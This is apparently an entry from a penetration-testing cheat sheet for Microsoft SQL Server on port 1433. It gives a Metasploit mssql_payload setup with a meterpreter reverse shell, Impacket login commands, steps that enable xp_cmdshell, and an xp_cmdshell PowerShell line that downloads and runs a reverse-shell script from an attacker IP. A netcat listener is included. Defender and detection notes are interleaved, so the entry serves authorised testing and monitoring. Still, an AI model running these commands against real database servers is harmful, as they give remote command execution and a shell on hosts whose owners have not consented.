1433/TCP (MSSQL Server)

Microsoft SQL Server.

Metasploit

# Authenticated module: it needs a working SQL Server login (username/password
# below), so it only applies once credentials are already known.
# Defender note: the module is documented as executing its payload through
# xp_cmdshell, which a sysadmin login can switch back on, so the effective
# control is that no application or shared login holds sysadmin. Also restrict
# 1433/TCP to the hosts that need it.
use exploit/windows/mssql/mssql_payload
set username <username>
set password <password>
set rhosts <IP-address>
# Reverse payload: the database host opens an outbound connection to
# lhost:lport. Egress filtering on database servers and alerting on outbound
# connections from the SQL Server service are the matching controls.
set payload windows/x64/meterpreter_reverse_tcp
set lhost <attacker-IP-address>
set lport <listen-port>
run

Impacket

# Windows authentication (-windows-auth: the credentials are a Windows account)
mssqlclient.py <target-name>/<username>:<password>@<IP-address> -windows-auth
# Microsoft SQL Server authentication (no flag: the credentials are a SQL Server login)
mssqlclient.py <target-name>/<username>:<password>@<IP-address>
# The statements below are typed inside the mssqlclient SQL session.
# Changing options with sp_configure requires the ALTER SETTINGS permission
# (held by sysadmin and serveradmin), so this only works with a privileged login.
# Detection: each option change is written to the SQL Server error log and the
# Windows Application log as message 15457 ("Configuration option ... changed
# from 0 to 1"); alert on it for 'xp_cmdshell' and 'show advanced options'.
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
reconfigure;
# With no arguments, sp_configure lists the current option values (used here to confirm the change).
sp_configure;
# For a sysadmin caller, xp_cmdshell runs the command as the SQL Server service
# account, so whoami shows what that account is. Running the service under a
# low-privileged account limits the impact.
EXEC master..xp_cmdshell 'whoami';
# The next three lines are shell commands for the tester's own host, not SQL.
python3 -m http.server 80
cp reverse-shell.ps1 .
nc -lvnp <listen-port>
# Back in the SQL session: the server downloads a script over HTTP and runs it in memory.
# Detection: sqlservr.exe spawning cmd.exe or powershell.exe, PowerShell
# script-block logging showing IEX with Net.WebClient/DownloadString, and a
# database server making outbound HTTP requests.
EXEC master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attacker-IP-address>/reverse-shell.ps1\");'
